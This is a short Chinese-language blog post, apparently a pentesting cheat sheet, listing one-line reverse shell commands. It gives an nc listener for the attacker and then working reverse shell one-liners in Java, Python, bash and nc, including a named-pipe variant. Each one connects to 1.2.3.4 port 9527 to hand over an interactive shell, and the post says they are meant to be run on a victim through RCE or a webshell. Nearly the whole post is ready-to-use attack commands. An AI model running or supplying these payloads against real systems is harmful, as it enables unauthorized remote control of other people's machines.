各种语言的一句话反弹 shell 命令


攻击主机先监听端口

最简单的脚本可以用 nc :

nc -lvvp 9527

被攻击主机连接到服务端口

一般都需要通过 RCE、 webshell 等方式在被攻击机执行以下命令,具体怎么做就要看水平了:

JAVA

Runtime.getRuntime().exec(["/bin/bash","-c","exec 5<>/dev/tcp/1.2.3.4/9527;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); 

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",9527));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

bash

bash -i >& /dev/tcp/1.2.3.4/9527 0>&1

nc

nc -e /bin/sh 1.2.3.4 9527

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 1.2.3.4 9527 1>/tmp/backpipe

文章作者: EXP
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 EXP !
 上一篇
trojan 睁眼看世界教程 trojan 睁眼看世界教程
trojan 简介trojan 是近两年兴起的科学上网工具,项目源码为 https://github.com/trojan-gfw。 与强调加密和混淆的SS/SSR等工具不同,trojan 将通信流量伪装成互联网上最常见的 HTTPS 流量
2020-08-28
下一篇 
威胁情报播报 威胁情报播报
从 360、奇安信、红后、绿盟、安全客、斗象 等公开来源爬取并整合最新的威胁情报信息,并实时推送到 邮箱、订阅号、QQ 群
2020-05-01
  目录